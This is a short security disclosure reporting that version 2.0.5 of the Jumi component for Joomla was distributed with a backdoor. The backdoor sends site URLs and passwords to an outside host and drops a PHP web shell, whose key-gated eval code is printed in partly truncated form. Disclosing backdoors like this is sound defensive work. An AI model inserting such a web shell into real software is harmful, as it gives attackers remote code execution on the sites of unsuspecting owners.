21.47.42 com_jumi / jumi 2.0.5 for joomla 1.5 backdoored | |
Summary: another backdoored joomla component (yawn) Application: Jumi, a joomla component About Jumi: Jumi is the set of custom code extensions for Joomla! 1.0.x and 1.5.x in their native modes. Since 2006 more then 200.000 downloads. With Jumi you can include php, html, javascript scripts into the modules position, articles, category or section descriptions, or into your own custom made component pages. Fun snippet from the release_notes.txt: Changes: - Fixed: security vulnerability Vendor notified: *.cz .. I looked at the fun pictures on the "about us" screen, and left it at that. Joomla? A CC of this mail on their "STRIKE TEAM" form (are you afraid of e-mail gentlemen?) Download url/s: http://extensions.joomla.org/ http://jumi.vedeme.cz/index. http://jumi.vedeme.cz/index. md5sum: 1037de7cc97ba348440a93db1ee894 The installation sends your joomla URL and passwords to http://my-wnl.org/index.php and drops the following file: modules/mod_mainmenu/tmpl/. Which says that the loveless individual who did the backdooring doesn't like to share (c'mon man, give a bit): <?php if(empty ($_REQUEST['key']) || sha1(md5($_REQUEST['key']))!=' 404 Not Found"); exit();} header("Content-Type: Text/Plain"); eval(stripslashes($_REQUEST[' ?> abuse@ispgateway.de: you are hosting the backdoor notification site | |
|
Total comments: 0 | |